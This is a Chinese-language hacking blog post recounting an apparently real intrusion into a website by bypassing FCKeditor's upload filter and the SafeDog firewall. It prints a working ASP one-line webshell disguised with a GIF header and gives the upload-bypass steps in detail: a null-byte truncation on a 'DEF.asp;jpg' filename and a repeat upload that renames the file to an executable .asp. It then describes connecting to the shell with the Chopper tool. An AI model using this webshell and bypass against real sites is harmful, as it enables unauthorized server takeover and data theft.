实战入侵(突破FCK+安全狗上传)

PS:有点尴尬,二次上传突破FCK,免杀马儿过狗。

刚开始和超霸一起弄,TMDGB.弄到四点多,早上尼玛七点多的又去考试,虽然考试还是睡着了,但是TMDGB感觉日子好充实啊!

FCK上传地址如下所示:

http://www.xxx.cn/fckeditor/editor/filemanager/connectors/uploadtest.html

先准备好一个过狗一句话:

<%if request ("1")<>""then session("1")=request("1"):end if:if session("1")<>"" then execute session("1")%>GIF89A 
#密码1

将马儿保存为jpg格式,上传后抓包。

选择%00右键

然后发送。然后就会变成这个样子

这里涉及到两个知识,

1.%00的意思是将“;jpg”进行截断,也就是舍去,不要它。

2.为啥是DEF.asp;jpg呢?这里其实就是突破FCK的重点了。为啥呢?因为FCK会逮住小数点后面的名称。如果是asp肯定能是不行的,所以要承接一个图片的,因为这个图片是要给FCK看的。如果后面的不是他运行的格式,也肯定不让你上传。

过狗上传

那么过狗的姿势呢?其实很简单。如下所示


 


然后发送GO。

 

注意!

上传成功后返回的路径是:/upfile//DEF.asp_;jpg

这个显然不能被解析!而且会被安全狗拦截!

很简单因为DEF.asp_;jpg。在安全狗里面IIS6.0的解析漏洞是没办法利用的。就算是http://www.xishaonian.com/1.asp/1.jpg也是不可以连接的!

 那我们再GO一次!

 

然后你会惊奇的发现。

文件被改名成了:/upfile//DEF(1).asp

这里又涉及到一个重命名的知识点,当你本地建立一个已有的文件windows就会给你重命名。(PS:其实之前那个没有被删,只是不让你访问罢了.)

由upfile//DEF.asp_;jpg

重命名成了

/upfile//DEF(1).asp

为啥_;jpg没有了呢。很简单被我们的%00给截断了的。所以也就是upfile/def.asp被重命名为upfile/def(1).asp的过程。

那么我们现在访问一下。

如图所示。成功了的!直接拿菜刀连接。

拿下!

通过两天才拿下,这里还有几个小的知识点要总结的。

原文地址:https://www.cnblogs.com/xishaonian/p/6219819.html